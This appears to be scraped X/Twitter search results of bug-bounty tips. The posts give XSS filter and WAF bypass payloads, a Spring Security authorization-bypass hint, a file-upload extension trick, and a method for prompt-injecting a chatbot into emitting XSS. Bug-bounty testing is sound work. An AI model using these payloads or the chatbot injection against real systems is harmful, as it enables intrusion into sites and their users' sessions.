#securecodingagainsthttpresponsesplitting search results
How do we turn bad SSRF (blind) into good SSRF (full response)? The @assetnote Security Research team at @SLCyberSec used a novel technique involving HTTP redirect loops and incremental status codes that leaked the full HTTP resp. It may work elsewhere! slcyber.io/assetnote-secu…

Ethical Hacking Reminder Bypass XSS WAF protection using invisible separators before or after function name <img/src/onerror=alert(1337)> <svg/onload= alert(2)>

My new XSS Bypass Filter! "/><svg+svg+svg\/\/On+OnLoAd=confirm(1)> Please let me know if some researcher found this before me in the comments! Thank you :) And happy hacking! #bugbounty #bugbountytips #0day #exploit #xss #hacking #hackers #bugs

XSS via Prompt Injection 💥🧠🔓 🤖 Find a chatbot 🧠 Ask what model it is 🔁 Get it to repeat text ⚠️ Make it say: '"><img src=x onerror=alert()> 💥 Escalate to Reflected/Stored XSS via URL param

We have combined all the tricks we know about SSRF into a single mindmap. If we missed something, write about it in the comments! High resolution: raw.githubusercontent.com/hackerscrolls/… XMind source: github.com/hackerscrolls/… #CyberSecurity #BugBountyTip #BugBounty

A XSS payload with Alert Obfuscation, for bypass RegEx filters <img src="X" onerror=top[8680439..toString(30)](1337)> <script>top[8680439..toString(30)](1337)</script> #infosec #cybersec #bugbountytip #BugBounty
&gt;
&lt;script&gt;top[8680439..toString(30)](1337)&lt;/script&gt;
#infosec #cybersec #bugbountytip #BugBounty](https://pbs.twimg.com/media/GflgRK_XQAAtqxe.jpg)
Bug Bounty Hint⚔️🛡️ File Upload Extension Splitting Cheat Sheet : #infosecurity #cybersecurite #bugbountytips

Cloudflare WAF Bypass → XSS 💡 The vulnerability occurred because the URL was being printed directly in JavaScript. Used this payload to achieve reflected XSS: --'<00 foo="<a%20href="javascript:prompt(404)">XSS-Click</00>--%20// #CyberSecurity #InfoSec #BugBounty #XSS…

Unrestricted file-upload bypass: if a server trusts only Content-Type/extension, attackers can use Content-Disposition double-extensions to upload .asp/.php disguised as image/jpeg. magic-bytes ≠ MIME, presence of `<%...%>` or `<?php`, accessible executable URIs. #BugBounty

XSS: Arithmetic Operators & Optional Chaining To Bypass Filters & Sanitization secjuice.com/xss-arithmetic… #infosec #XSS #cybersec #bugbountytips

CVE-2022-22978 Spring Security RegexRequestMatcher Authorization Bypass EXP: %0d or %oa github.com/spring-project… nosec.org/m/share/5006.h…

Bug Bounty Tip :: HTML Injection - Information Disclosure Hijack information from a page using <img> tag with unclosed "src" attr #CyberSecurity #cybersecuritytips #Hacking #BugBounty #bugbountytip #infosec #hacker #togetherwehitharder #bugcrowd #hack #hackers #hackerone

A Bird’s Eye View of Defense-in-Depth Structure of Cybersecurity

Wireshark Filter Cheat Sheet 👉🏿Full HD Image: github.com/Ignitetechnolo… #infosec #cybersecurity #cybersecuritytips #pentesting #redteam #informationsecurity #CyberSec #networking #networksecurity #infosecurity #cyberattacks #cybersecurityawareness #bugbounty #bugbountytips

Bypassing antiviruses using simple encoding technique algorithm in PowerShell and Python scripts, credential extraction script for browsers #redteam #RedTeaming #BlueTeam #bugbountytips #bugbounty #Security #dfir #CyberSecurity #forensic




Hiding Malware Inside Images on GoogleUserContent : blog.sucuri.net/2018/07/hiding… , Ref* - Malware Hidden Inside JPG EXIF Headers : blog.sucuri.net/2013/07/malwar…

Xss in asp pages reflected inside span and < blocked. Payloads: %u003Csvg onload=alert(1)> %u3008svg onload=alert(2)> %uFF1Csvg onload=alert(3)> #bugbounty #bugbountytips

Something went wrong.
Something went wrong.
United States Trends
- 1. #KonamiWorldSeriesSweepstakes 1,807 posts
- 2. Mitch McConnell 30.8K posts
- 3. Term 196K posts
- 4. John Bolton 26.9K posts
- 5. #2025MAMAVOTE 1.63M posts
- 6. Andrade 10.9K posts
- 7. AJ Green N/A
- 8. Ace Frehley N/A
- 9. Carter Hart 3,673 posts
- 10. Tyla 32.3K posts
- 11. Budapest 23.6K posts
- 12. Dairy Bird N/A
- 13. HARD LAUNCH 6,081 posts
- 14. No Kings 157K posts
- 15. Anya 17.2K posts
- 16. Nissan 5,118 posts
- 17. Big L 11.4K posts
- 18. Nick Khan N/A
- 19. Jaden Ivey N/A
- 20. Chanel 31.8K posts